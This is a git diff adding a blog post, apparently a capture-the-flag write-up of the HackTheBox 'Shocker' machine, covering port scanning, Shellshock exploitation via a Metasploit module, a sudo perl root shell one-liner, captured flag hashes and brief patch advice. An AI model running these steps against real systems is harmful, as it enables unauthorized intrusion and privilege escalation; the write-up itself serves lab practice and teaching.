add: writeup-ctf

2024-03-02 21:49:07 +01:00
parent ff520654f0
commit 095a13b2c9
1021 changed files with 9299 additions and 0 deletions
--- a/content/writeup-ctf/writeup-shocker-htb/featured.png
+++ b/content/writeup-ctf/writeup-shocker-htb/featured.png
--- a/content/writeup-ctf/writeup-shocker-htb/featured.webp
+++ b/content/writeup-ctf/writeup-shocker-htb/featured.webp
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-1.png
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-1.png
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-1.webp
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-1.webp
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-2.png
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-2.png
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-2.webp
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-2.webp
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-3.png
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-3.png
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-3.webp
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-3.webp
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-4.png
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-4.png
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-4.webp
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-4.webp
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-5.png
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-5.png
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-5.webp
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-5.webp
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-6.png
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-6.png
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-6.webp
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-6.webp
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-7.png
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-7.png
--- a/content/writeup-ctf/writeup-shocker-htb/img/image-7.webp
+++ b/content/writeup-ctf/writeup-shocker-htb/img/image-7.webp
--- a/content/writeup-ctf/writeup-shocker-htb/index.md
+++ b/content/writeup-ctf/writeup-shocker-htb/index.md
@ -0,0 +1,91 @@
+---
+title: "Writeup - Shocker (HTB)"
+date: 2022-05-12
+slug: "writeup-shocker-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Shocker](https://app.hackthebox.com/machines/Shocker) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.146
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 2222/tcp : SSH port (OpenSSH 7.2p2)
+- 80/tcp : HTTP web server (Apache 2.4.18)
+
+![](img/image-2.webp)
+
+## Exploit
+
+At first I start by listing the files of the website.
+
+![](img/image-3.webp)
+
+We find a `cgi-bin` folder.
+
+![](img/image-4.webp)
+
+Listing the folder we find a file: `user.sh`.
+
+
+```bash
+Content-Type: text/plain
+
+Just an uptime test script
+
+ 03:47:39 up 10 min,  0 users,  load average: 0.00, 0.00, 0.00
+```
+10.10.10.56/cgi-bin/user.shBy searching a little bit I quickly find exploits to [cgi-bin](https://book.hacktricks.xyz/pentesting/pentesting-web/cgi). I choose to use the Metasploit module: `multi/http/apache_mod_cgi_bash_env_exec`.
+
+![](img/image-5.webp)
+
+By running the module I get a reverse shell. I start by upgrading this reverse shell :
+
+![](img/image-6.webp)
+
+Then I get the first flag.
+
+
+```bash
+shelly@Shocker:/usr/lib/cgi-bin$ cat /home/shelly/user.txt
+cat /home/shelly/user.txt
+2ec24e11320026d1e70ff3e16695b233
+```
+## Privilege escalation
+
+I start by checking the sudo permissions of my user.
+
+![](img/image-7.webp)
+
+Looking on GTFO, I find the page associated to [Perl](https://gtfobins.github.io/gtfobins/perl/#sudo). I use the following command to generate a SH session as root:
+
+
+```bash
+sudo perl -e 'exec "/bin/sh";'
+```
+I can now recover the last flag.
+
+
+```bash
+# id
+id
+uid=0(root) gid=0(root) groups=0(root)
+# cat /root/root.txt
+cat /root/root.txt
+52c2715605d70c7619030560dc1ca467
+```
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update the machine to patch shellshock
+- Do not allow root rights to run perl